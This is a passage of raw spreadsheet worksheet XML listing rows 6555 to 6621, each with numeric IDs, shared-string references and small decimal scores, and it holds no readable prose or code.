        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="6555" ht="15.75" customHeight="1">
      <c r="A6555" s="1">
        <v>585.0</v>
      </c>
      <c r="B6555" s="2">
        <v>1.9139014E7</v>
      </c>
      <c r="C6555" s="2" t="s">
        <v>6237</v>
      </c>
      <c r="D6555" s="2">
        <v>1.0</v>
      </c>
      <c r="E6555" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6555" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="6556" ht="15.75" customHeight="1">
      <c r="A6556" s="1">
        <v>20792.0</v>
      </c>
      <c r="B6556" s="2">
        <v>1.5230908E7</v>
      </c>
      <c r="C6556" s="2" t="s">
        <v>6238</v>
      </c>
      <c r="D6556" s="2">
        <v>1.0</v>
      </c>
      <c r="E6556" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6556" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="6557" ht="15.75" customHeight="1">
      <c r="A6557" s="1">
        <v>20911.0</v>
      </c>
      <c r="B6557" s="2">
        <v>1.6314861E7</v>
      </c>
      <c r="C6557" s="2" t="s">
        <v>6239</v>
      </c>
      <c r="D6557" s="2">
        <v>1.0</v>
      </c>
      <c r="E6557" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6557" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="6558" ht="15.75" customHeight="1">
      <c r="A6558" s="1">
        <v>22784.0</v>
      </c>
      <c r="B6558" s="2">
        <v>4.5288883E7</v>
      </c>
      <c r="C6558" s="2" t="s">
        <v>6240</v>
      </c>
      <c r="D6558" s="2">
        <v>1.0</v>
      </c>
      <c r="E6558" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6558" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="6559" ht="15.75" customHeight="1">
      <c r="A6559" s="1">
        <v>23919.0</v>
      </c>
      <c r="B6559" s="2">
        <v>8543748.0</v>
      </c>
      <c r="C6559" s="2" t="s">
        <v>6241</v>
      </c>
      <c r="D6559" s="2">
        <v>1.0</v>
      </c>
      <c r="E6559" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6559" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="6560" ht="15.75" customHeight="1">
      <c r="A6560" s="1">
        <v>24357.0</v>
      </c>
      <c r="B6560" s="2">
        <v>1.0736659E7</v>
      </c>
      <c r="C6560" s="2" t="s">
        <v>6242</v>
      </c>
      <c r="D6560" s="2">
        <v>1.0</v>
      </c>
      <c r="E6560" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6560" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="6561" ht="15.75" customHeight="1">
      <c r="A6561" s="1">
        <v>24732.0</v>
      </c>
      <c r="B6561" s="2">
        <v>1.1755873E7</v>
      </c>
      <c r="C6561" s="2" t="s">
        <v>6243</v>
      </c>
      <c r="D6561" s="2">
        <v>1.0</v>
      </c>
      <c r="E6561" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6561" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="6562" ht="15.75" customHeight="1">
      <c r="A6562" s="1">
        <v>26882.0</v>
      </c>
      <c r="B6562" s="2">
        <v>1.9192317E7</v>
      </c>
      <c r="C6562" s="2" t="s">
        <v>6244</v>
      </c>
      <c r="D6562" s="2">
        <v>1.0</v>
      </c>
      <c r="E6562" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6562" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="6563" ht="15.75" customHeight="1">
      <c r="A6563" s="1">
        <v>29618.0</v>
      </c>
      <c r="B6563" s="2">
        <v>3.3649245E7</v>
      </c>
      <c r="C6563" s="2" t="s">
        <v>6245</v>
      </c>
      <c r="D6563" s="2">
        <v>1.0</v>
      </c>
      <c r="E6563" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6563" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="6564" ht="15.75" customHeight="1">
      <c r="A6564" s="1">
        <v>30544.0</v>
      </c>
      <c r="B6564" s="2">
        <v>4.0604318E7</v>
      </c>
      <c r="C6564" s="2" t="s">
        <v>6146</v>
      </c>
      <c r="D6564" s="2">
        <v>1.0</v>
      </c>
      <c r="E6564" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6564" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="6565" ht="15.75" customHeight="1">
      <c r="A6565" s="1">
        <v>32528.0</v>
      </c>
      <c r="B6565" s="2">
        <v>5.7325505E7</v>
      </c>
      <c r="C6565" s="2" t="s">
        <v>6246</v>
      </c>
      <c r="D6565" s="2">
        <v>1.0</v>
      </c>
      <c r="E6565" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6565" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="6566" ht="15.75" customHeight="1">
      <c r="A6566" s="1">
        <v>32939.0</v>
      </c>
      <c r="B6566" s="2">
        <v>6461197.0</v>
      </c>
      <c r="C6566" s="2" t="s">
        <v>6247</v>
      </c>
      <c r="D6566" s="2">
        <v>1.0</v>
      </c>
      <c r="E6566" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6566" s="2">
        <v>0.1155202821869489</v>
      </c>
    </row>
    <row r="6567" ht="15.75" customHeight="1">
      <c r="A6567" s="1">
        <v>26594.0</v>
      </c>
      <c r="B6567" s="2">
        <v>1.7964716E7</v>
      </c>
      <c r="C6567" s="2" t="s">
        <v>6248</v>
      </c>
      <c r="D6567" s="2">
        <v>1.0</v>
      </c>
      <c r="E6567" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6567" s="2">
        <v>0.1150793650793651</v>
      </c>
    </row>
    <row r="6568" ht="15.75" customHeight="1">
      <c r="A6568" s="1">
        <v>9139.0</v>
      </c>
      <c r="B6568" s="2">
        <v>5.5246744E7</v>
      </c>
      <c r="C6568" s="2" t="s">
        <v>6249</v>
      </c>
      <c r="D6568" s="2">
        <v>1.0</v>
      </c>
      <c r="E6568" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6568" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="6569" ht="15.75" customHeight="1">
      <c r="A6569" s="1">
        <v>32359.0</v>
      </c>
      <c r="B6569" s="2">
        <v>5.5948391E7</v>
      </c>
      <c r="C6569" s="2" t="s">
        <v>6250</v>
      </c>
      <c r="D6569" s="2">
        <v>1.0</v>
      </c>
      <c r="E6569" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6569" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="6570" ht="15.75" customHeight="1">
      <c r="A6570" s="1">
        <v>21543.0</v>
      </c>
      <c r="B6570" s="2">
        <v>2.3538155E7</v>
      </c>
      <c r="C6570" s="2" t="s">
        <v>6251</v>
      </c>
      <c r="D6570" s="2">
        <v>1.0</v>
      </c>
      <c r="E6570" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6570" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="6571" ht="15.75" customHeight="1">
      <c r="A6571" s="1">
        <v>23231.0</v>
      </c>
      <c r="B6571" s="2">
        <v>5.2866823E7</v>
      </c>
      <c r="C6571" s="2" t="s">
        <v>6252</v>
      </c>
      <c r="D6571" s="2">
        <v>1.0</v>
      </c>
      <c r="E6571" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6571" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="6572" ht="15.75" customHeight="1">
      <c r="A6572" s="1">
        <v>30105.0</v>
      </c>
      <c r="B6572" s="2">
        <v>3.6569535E7</v>
      </c>
      <c r="C6572" s="2" t="s">
        <v>6253</v>
      </c>
      <c r="D6572" s="2">
        <v>1.0</v>
      </c>
      <c r="E6572" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6572" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="6573" ht="15.75" customHeight="1">
      <c r="A6573" s="1">
        <v>31040.0</v>
      </c>
      <c r="B6573" s="2">
        <v>4.7848485E7</v>
      </c>
      <c r="C6573" s="2" t="s">
        <v>6254</v>
      </c>
      <c r="D6573" s="2">
        <v>1.0</v>
      </c>
      <c r="E6573" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6573" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="6574" ht="15.75" customHeight="1">
      <c r="A6574" s="1">
        <v>32976.0</v>
      </c>
      <c r="B6574" s="2">
        <v>6561522.0</v>
      </c>
      <c r="C6574" s="2" t="s">
        <v>6255</v>
      </c>
      <c r="D6574" s="2">
        <v>1.0</v>
      </c>
      <c r="E6574" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6574" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="6575" ht="15.75" customHeight="1">
      <c r="A6575" s="1">
        <v>33076.0</v>
      </c>
      <c r="B6575" s="2">
        <v>6894539.0</v>
      </c>
      <c r="C6575" s="2" t="s">
        <v>6256</v>
      </c>
      <c r="D6575" s="2">
        <v>1.0</v>
      </c>
      <c r="E6575" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6575" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="6576" ht="15.75" customHeight="1">
      <c r="A6576" s="1">
        <v>462.0</v>
      </c>
      <c r="B6576" s="2">
        <v>1.7286043E7</v>
      </c>
      <c r="C6576" s="2" t="s">
        <v>6257</v>
      </c>
      <c r="D6576" s="2">
        <v>1.0</v>
      </c>
      <c r="E6576" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6576" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6577" ht="15.75" customHeight="1">
      <c r="A6577" s="1">
        <v>694.0</v>
      </c>
      <c r="B6577" s="2">
        <v>2.0436115E7</v>
      </c>
      <c r="C6577" s="2" t="s">
        <v>6258</v>
      </c>
      <c r="D6577" s="2">
        <v>1.0</v>
      </c>
      <c r="E6577" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6577" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6578" ht="15.75" customHeight="1">
      <c r="A6578" s="1">
        <v>1957.0</v>
      </c>
      <c r="B6578" s="2">
        <v>3.0292301E7</v>
      </c>
      <c r="C6578" s="2" t="s">
        <v>6259</v>
      </c>
      <c r="D6578" s="2">
        <v>1.0</v>
      </c>
      <c r="E6578" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6578" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6579" ht="15.75" customHeight="1">
      <c r="A6579" s="1">
        <v>2426.0</v>
      </c>
      <c r="B6579" s="2">
        <v>3.358755E7</v>
      </c>
      <c r="C6579" s="2" t="s">
        <v>6260</v>
      </c>
      <c r="D6579" s="2">
        <v>1.0</v>
      </c>
      <c r="E6579" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6579" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6580" ht="15.75" customHeight="1">
      <c r="A6580" s="1">
        <v>3682.0</v>
      </c>
      <c r="B6580" s="2">
        <v>3.9464039E7</v>
      </c>
      <c r="C6580" s="2" t="s">
        <v>6261</v>
      </c>
      <c r="D6580" s="2">
        <v>1.0</v>
      </c>
      <c r="E6580" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6580" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6581" ht="15.75" customHeight="1">
      <c r="A6581" s="1">
        <v>3885.0</v>
      </c>
      <c r="B6581" s="2">
        <v>4.0372996E7</v>
      </c>
      <c r="C6581" s="2" t="s">
        <v>6262</v>
      </c>
      <c r="D6581" s="2">
        <v>1.0</v>
      </c>
      <c r="E6581" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6581" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6582" ht="15.75" customHeight="1">
      <c r="A6582" s="1">
        <v>5383.0</v>
      </c>
      <c r="B6582" s="2">
        <v>4.5416569E7</v>
      </c>
      <c r="C6582" s="2" t="s">
        <v>6263</v>
      </c>
      <c r="D6582" s="2">
        <v>1.0</v>
      </c>
      <c r="E6582" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6582" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6583" ht="15.75" customHeight="1">
      <c r="A6583" s="1">
        <v>6342.0</v>
      </c>
      <c r="B6583" s="2">
        <v>4.8306299E7</v>
      </c>
      <c r="C6583" s="2" t="s">
        <v>6264</v>
      </c>
      <c r="D6583" s="2">
        <v>1.0</v>
      </c>
      <c r="E6583" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6583" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6584" ht="15.75" customHeight="1">
      <c r="A6584" s="1">
        <v>6656.0</v>
      </c>
      <c r="B6584" s="2">
        <v>4.909662E7</v>
      </c>
      <c r="C6584" s="2" t="s">
        <v>6265</v>
      </c>
      <c r="D6584" s="2">
        <v>1.0</v>
      </c>
      <c r="E6584" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6584" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6585" ht="15.75" customHeight="1">
      <c r="A6585" s="1">
        <v>10777.0</v>
      </c>
      <c r="B6585" s="2">
        <v>1.5654275E7</v>
      </c>
      <c r="C6585" s="2" t="s">
        <v>6266</v>
      </c>
      <c r="D6585" s="2">
        <v>1.0</v>
      </c>
      <c r="E6585" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6585" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6586" ht="15.75" customHeight="1">
      <c r="A6586" s="1">
        <v>11002.0</v>
      </c>
      <c r="B6586" s="2">
        <v>1.7653955E7</v>
      </c>
      <c r="C6586" s="2" t="s">
        <v>6267</v>
      </c>
      <c r="D6586" s="2">
        <v>1.0</v>
      </c>
      <c r="E6586" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6586" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6587" ht="15.75" customHeight="1">
      <c r="A6587" s="1">
        <v>12353.0</v>
      </c>
      <c r="B6587" s="2">
        <v>2.8682567E7</v>
      </c>
      <c r="C6587" s="2" t="s">
        <v>6268</v>
      </c>
      <c r="D6587" s="2">
        <v>1.0</v>
      </c>
      <c r="E6587" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6587" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6588" ht="15.75" customHeight="1">
      <c r="A6588" s="1">
        <v>12921.0</v>
      </c>
      <c r="B6588" s="2">
        <v>3.2277642E7</v>
      </c>
      <c r="C6588" s="2" t="s">
        <v>6269</v>
      </c>
      <c r="D6588" s="2">
        <v>1.0</v>
      </c>
      <c r="E6588" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6588" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6589" ht="15.75" customHeight="1">
      <c r="A6589" s="1">
        <v>13548.0</v>
      </c>
      <c r="B6589" s="2">
        <v>3.5659102E7</v>
      </c>
      <c r="C6589" s="2" t="s">
        <v>6270</v>
      </c>
      <c r="D6589" s="2">
        <v>1.0</v>
      </c>
      <c r="E6589" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6589" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6590" ht="15.75" customHeight="1">
      <c r="A6590" s="1">
        <v>13740.0</v>
      </c>
      <c r="B6590" s="2">
        <v>3.643886E7</v>
      </c>
      <c r="C6590" s="2" t="s">
        <v>6271</v>
      </c>
      <c r="D6590" s="2">
        <v>1.0</v>
      </c>
      <c r="E6590" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6590" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6591" ht="15.75" customHeight="1">
      <c r="A6591" s="1">
        <v>15624.0</v>
      </c>
      <c r="B6591" s="2">
        <v>4.3555119E7</v>
      </c>
      <c r="C6591" s="2" t="s">
        <v>6272</v>
      </c>
      <c r="D6591" s="2">
        <v>1.0</v>
      </c>
      <c r="E6591" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6591" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6592" ht="15.75" customHeight="1">
      <c r="A6592" s="1">
        <v>16569.0</v>
      </c>
      <c r="B6592" s="2">
        <v>4.6868032E7</v>
      </c>
      <c r="C6592" s="2" t="s">
        <v>6273</v>
      </c>
      <c r="D6592" s="2">
        <v>1.0</v>
      </c>
      <c r="E6592" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6592" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6593" ht="15.75" customHeight="1">
      <c r="A6593" s="1">
        <v>16851.0</v>
      </c>
      <c r="B6593" s="2">
        <v>4.7910396E7</v>
      </c>
      <c r="C6593" s="2" t="s">
        <v>6274</v>
      </c>
      <c r="D6593" s="2">
        <v>1.0</v>
      </c>
      <c r="E6593" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6593" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6594" ht="15.75" customHeight="1">
      <c r="A6594" s="1">
        <v>17082.0</v>
      </c>
      <c r="B6594" s="2">
        <v>4.8614875E7</v>
      </c>
      <c r="C6594" s="2" t="s">
        <v>6275</v>
      </c>
      <c r="D6594" s="2">
        <v>1.0</v>
      </c>
      <c r="E6594" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6594" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6595" ht="15.75" customHeight="1">
      <c r="A6595" s="1">
        <v>17158.0</v>
      </c>
      <c r="B6595" s="2">
        <v>4.888925E7</v>
      </c>
      <c r="C6595" s="2" t="s">
        <v>6276</v>
      </c>
      <c r="D6595" s="2">
        <v>1.0</v>
      </c>
      <c r="E6595" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6595" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6596" ht="15.75" customHeight="1">
      <c r="A6596" s="1">
        <v>17770.0</v>
      </c>
      <c r="B6596" s="2">
        <v>5.0756276E7</v>
      </c>
      <c r="C6596" s="2" t="s">
        <v>6277</v>
      </c>
      <c r="D6596" s="2">
        <v>1.0</v>
      </c>
      <c r="E6596" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6596" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6597" ht="15.75" customHeight="1">
      <c r="A6597" s="1">
        <v>18376.0</v>
      </c>
      <c r="B6597" s="2">
        <v>5.2577789E7</v>
      </c>
      <c r="C6597" s="2" t="s">
        <v>6278</v>
      </c>
      <c r="D6597" s="2">
        <v>1.0</v>
      </c>
      <c r="E6597" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6597" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6598" ht="15.75" customHeight="1">
      <c r="A6598" s="1">
        <v>19536.0</v>
      </c>
      <c r="B6598" s="2">
        <v>5.6023179E7</v>
      </c>
      <c r="C6598" s="2" t="s">
        <v>6279</v>
      </c>
      <c r="D6598" s="2">
        <v>1.0</v>
      </c>
      <c r="E6598" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6598" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6599" ht="15.75" customHeight="1">
      <c r="A6599" s="1">
        <v>20292.0</v>
      </c>
      <c r="B6599" s="2">
        <v>1.1263053E7</v>
      </c>
      <c r="C6599" s="2" t="s">
        <v>6280</v>
      </c>
      <c r="D6599" s="2">
        <v>1.0</v>
      </c>
      <c r="E6599" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6599" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6600" ht="15.75" customHeight="1">
      <c r="A6600" s="1">
        <v>20333.0</v>
      </c>
      <c r="B6600" s="2">
        <v>1.1526537E7</v>
      </c>
      <c r="C6600" s="2" t="s">
        <v>6281</v>
      </c>
      <c r="D6600" s="2">
        <v>1.0</v>
      </c>
      <c r="E6600" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6600" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6601" ht="15.75" customHeight="1">
      <c r="A6601" s="1">
        <v>20548.0</v>
      </c>
      <c r="B6601" s="2">
        <v>1.3380817E7</v>
      </c>
      <c r="C6601" s="2" t="s">
        <v>6282</v>
      </c>
      <c r="D6601" s="2">
        <v>1.0</v>
      </c>
      <c r="E6601" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6601" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6602" ht="15.75" customHeight="1">
      <c r="A6602" s="1">
        <v>20560.0</v>
      </c>
      <c r="B6602" s="2">
        <v>1.3402559E7</v>
      </c>
      <c r="C6602" s="2" t="s">
        <v>6283</v>
      </c>
      <c r="D6602" s="2">
        <v>1.0</v>
      </c>
      <c r="E6602" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6602" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6603" ht="15.75" customHeight="1">
      <c r="A6603" s="1">
        <v>20588.0</v>
      </c>
      <c r="B6603" s="2">
        <v>1.3775361E7</v>
      </c>
      <c r="C6603" s="2" t="s">
        <v>6284</v>
      </c>
      <c r="D6603" s="2">
        <v>1.0</v>
      </c>
      <c r="E6603" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6603" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6604" ht="15.75" customHeight="1">
      <c r="A6604" s="1">
        <v>20688.0</v>
      </c>
      <c r="B6604" s="2">
        <v>1.4488672E7</v>
      </c>
      <c r="C6604" s="2" t="s">
        <v>6285</v>
      </c>
      <c r="D6604" s="2">
        <v>1.0</v>
      </c>
      <c r="E6604" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6604" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6605" ht="15.75" customHeight="1">
      <c r="A6605" s="1">
        <v>20718.0</v>
      </c>
      <c r="B6605" s="2">
        <v>1.4632604E7</v>
      </c>
      <c r="C6605" s="2" t="s">
        <v>6286</v>
      </c>
      <c r="D6605" s="2">
        <v>1.0</v>
      </c>
      <c r="E6605" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6605" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6606" ht="15.75" customHeight="1">
      <c r="A6606" s="1">
        <v>20791.0</v>
      </c>
      <c r="B6606" s="2">
        <v>1.5177983E7</v>
      </c>
      <c r="C6606" s="2" t="s">
        <v>6287</v>
      </c>
      <c r="D6606" s="2">
        <v>1.0</v>
      </c>
      <c r="E6606" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6606" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6607" ht="15.75" customHeight="1">
      <c r="A6607" s="1">
        <v>20842.0</v>
      </c>
      <c r="B6607" s="2">
        <v>1.5651267E7</v>
      </c>
      <c r="C6607" s="2" t="s">
        <v>6288</v>
      </c>
      <c r="D6607" s="2">
        <v>1.0</v>
      </c>
      <c r="E6607" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6607" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6608" ht="15.75" customHeight="1">
      <c r="A6608" s="1">
        <v>20866.0</v>
      </c>
      <c r="B6608" s="2">
        <v>1.5882451E7</v>
      </c>
      <c r="C6608" s="2" t="s">
        <v>6289</v>
      </c>
      <c r="D6608" s="2">
        <v>1.0</v>
      </c>
      <c r="E6608" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6608" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6609" ht="15.75" customHeight="1">
      <c r="A6609" s="1">
        <v>20901.0</v>
      </c>
      <c r="B6609" s="2">
        <v>1.6252775E7</v>
      </c>
      <c r="C6609" s="2" t="s">
        <v>6290</v>
      </c>
      <c r="D6609" s="2">
        <v>1.0</v>
      </c>
      <c r="E6609" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6609" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6610" ht="15.75" customHeight="1">
      <c r="A6610" s="1">
        <v>20979.0</v>
      </c>
      <c r="B6610" s="2">
        <v>1.6960252E7</v>
      </c>
      <c r="C6610" s="2" t="s">
        <v>6291</v>
      </c>
      <c r="D6610" s="2">
        <v>1.0</v>
      </c>
      <c r="E6610" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6610" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6611" ht="15.75" customHeight="1">
      <c r="A6611" s="1">
        <v>21046.0</v>
      </c>
      <c r="B6611" s="2">
        <v>1.7696675E7</v>
      </c>
      <c r="C6611" s="2" t="s">
        <v>6292</v>
      </c>
      <c r="D6611" s="2">
        <v>1.0</v>
      </c>
      <c r="E6611" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6611" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6612" ht="15.75" customHeight="1">
      <c r="A6612" s="1">
        <v>21051.0</v>
      </c>
      <c r="B6612" s="2">
        <v>1.77104E7</v>
      </c>
      <c r="C6612" s="2" t="s">
        <v>6293</v>
      </c>
      <c r="D6612" s="2">
        <v>1.0</v>
      </c>
      <c r="E6612" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6612" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6613" ht="15.75" customHeight="1">
      <c r="A6613" s="1">
        <v>21073.0</v>
      </c>
      <c r="B6613" s="2">
        <v>1.7927823E7</v>
      </c>
      <c r="C6613" s="2" t="s">
        <v>6294</v>
      </c>
      <c r="D6613" s="2">
        <v>1.0</v>
      </c>
      <c r="E6613" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6613" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6614" ht="15.75" customHeight="1">
      <c r="A6614" s="1">
        <v>21845.0</v>
      </c>
      <c r="B6614" s="2">
        <v>2.7153434E7</v>
      </c>
      <c r="C6614" s="2" t="s">
        <v>6295</v>
      </c>
      <c r="D6614" s="2">
        <v>1.0</v>
      </c>
      <c r="E6614" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6614" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6615" ht="15.75" customHeight="1">
      <c r="A6615" s="1">
        <v>22225.0</v>
      </c>
      <c r="B6615" s="2">
        <v>3.2315908E7</v>
      </c>
      <c r="C6615" s="2" t="s">
        <v>6296</v>
      </c>
      <c r="D6615" s="2">
        <v>1.0</v>
      </c>
      <c r="E6615" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6615" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6616" ht="15.75" customHeight="1">
      <c r="A6616" s="1">
        <v>22308.0</v>
      </c>
      <c r="B6616" s="2">
        <v>3.3761612E7</v>
      </c>
      <c r="C6616" s="2" t="s">
        <v>6297</v>
      </c>
      <c r="D6616" s="2">
        <v>1.0</v>
      </c>
      <c r="E6616" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6616" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6617" ht="15.75" customHeight="1">
      <c r="A6617" s="1">
        <v>22353.0</v>
      </c>
      <c r="B6617" s="2">
        <v>3.4573385E7</v>
      </c>
      <c r="C6617" s="2" t="s">
        <v>6298</v>
      </c>
      <c r="D6617" s="2">
        <v>1.0</v>
      </c>
      <c r="E6617" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6617" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6618" ht="15.75" customHeight="1">
      <c r="A6618" s="1">
        <v>22636.0</v>
      </c>
      <c r="B6618" s="2">
        <v>4.0612579E7</v>
      </c>
      <c r="C6618" s="2" t="s">
        <v>6298</v>
      </c>
      <c r="D6618" s="2">
        <v>1.0</v>
      </c>
      <c r="E6618" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6618" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6619" ht="15.75" customHeight="1">
      <c r="A6619" s="1">
        <v>22826.0</v>
      </c>
      <c r="B6619" s="2">
        <v>4.6365144E7</v>
      </c>
      <c r="C6619" s="2" t="s">
        <v>6299</v>
      </c>
      <c r="D6619" s="2">
        <v>1.0</v>
      </c>
      <c r="E6619" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6619" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6620" ht="15.75" customHeight="1">
      <c r="A6620" s="1">
        <v>22961.0</v>
      </c>
      <c r="B6620" s="2">
        <v>4913951.0</v>
      </c>
      <c r="C6620" s="2" t="s">
        <v>6300</v>
      </c>
      <c r="D6620" s="2">
        <v>1.0</v>
      </c>
      <c r="E6620" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6620" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6621" ht="15.75" customHeight="1">
      <c r="A6621" s="1">
        <v>23049.0</v>
      </c>
      <c r="B6621" s="2">
        <v>5.0197571E7</v>
      </c>
      <c r="C6621" s="2" t="s">
        <v>6301</v>
      </c>
      <c r="D6621" s="2">
        <v>1.0</v>
      </c>
      <c r="E6621" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6621" s="2">
